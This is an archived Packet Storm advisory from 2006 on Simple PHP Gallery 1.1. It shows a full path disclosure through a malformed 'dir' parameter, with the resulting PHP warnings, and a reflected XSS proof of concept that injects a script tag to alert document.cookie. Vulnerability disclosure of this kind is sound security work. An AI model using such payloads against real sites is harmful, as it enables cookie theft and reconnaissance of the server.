exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

spg-xss.txt

spg-xss.txt
Posted Nov 27, 2006
Authored by Al7ejaz Hacker

Simple PHP Gallery version 1.1 suffers from a cross site scripting flaw.

tags | exploit, php, xss
SHA-256 | 88944544a16e9dac6f26da14d3579629367896361d5b17fc7edc2343e17c0520

spg-xss.txt

Change Mirror Download
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ ;;ii,,:: +
+ :::: :: ;;tt;;:: +
+ ;;:: ..,,:: ;;ii,,:: +
+ ,,,, ii;;,, ii;;:: ;;ii,,:: +
+ ii:: tt;;,, ..tt;;,,.. ;;ii;;:: +
+ ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: +
+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: +
+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: +
+ tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: +
+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: +
+ ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: +
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: +
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: +
+ ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. +
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. +
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. +
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. +
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. +
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. +
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. +
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; +
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, +
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, +
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: +
+ iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii +
+ ;;.. ii;; +
+ .. +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker +
+ +
+Script : Simple PHP Gallery 1.1 +
+Impact : Cross site scripting & fullpath disclosure +
+ +
+ +
+Fullpath disclosure : +
+ +
+http://localhost/sp_index.php?dir=[Somthingwrong] +
+ +
+Result +
+ +
+ +
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10 +
+ +
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11 +
+ +
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147 +
+ +
+ +
+ +
+ +
+Cross Site Scripting +
+ +
+ +
+ +
+dir variable is not probrely verified and can be used to execute html and javascript code +
+ +
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script> +
+ +
+/Milw0rm +
+ +
+ +
+in subject hot : Cross site scripting & fullpath disclosure ;) +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    8 Files
  • 6
    Jul 6th
    8 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close